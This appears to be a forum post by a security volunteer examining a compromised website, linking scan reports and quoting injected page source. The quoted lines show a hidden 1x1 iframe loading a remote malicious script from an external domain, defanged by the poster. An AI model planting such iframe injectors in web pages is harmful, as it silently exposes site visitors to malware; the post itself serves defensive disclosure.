Why not? Because for that uri that particular malcode is not being detected, see: http://jsunpack.jeek.org/?report=333543a962328e8f4e6a2a7f843d34c540542125 (for the security aware only, visit link with NoScript and RequestPolicy extensions active in the browser and inside a Virtual Machine/sandbox) → http://urlquery.net/report.php?id=4546823
This is being detected in the code on the main page that is being flagged line 50 (the detected external link - broken by me - pol)
46:< script type="text/javascript" src="/templates/pure_white/lib/js/iepngfix_tilebg.js"> < / script >
47:< style type="text/css">
48:* { behavior: url(< script type="text/javascript" language="javascript" > function zzzfff() {
49:var ewq = document.createElement(' iframe ');
50:ewq.src = 'htxp://vywuwix.com/count11.php';
51:ewq.style.position = 'absolute';
52:ewq.style.border = '0';
53:ewq.style.height = '1px';
54:ewq.style.width = '1px';
55:ewq.style.left = '1px';
56:ewq.style.top = '1px';
57:if (!document.getElementById('ewq')) {
58: document.write ('< div id=\'ewq\'> < /div> ');
59:document.getElementById('ewq').appendChild(ewq);
Taken from and via Redleg's FileViewer
polonus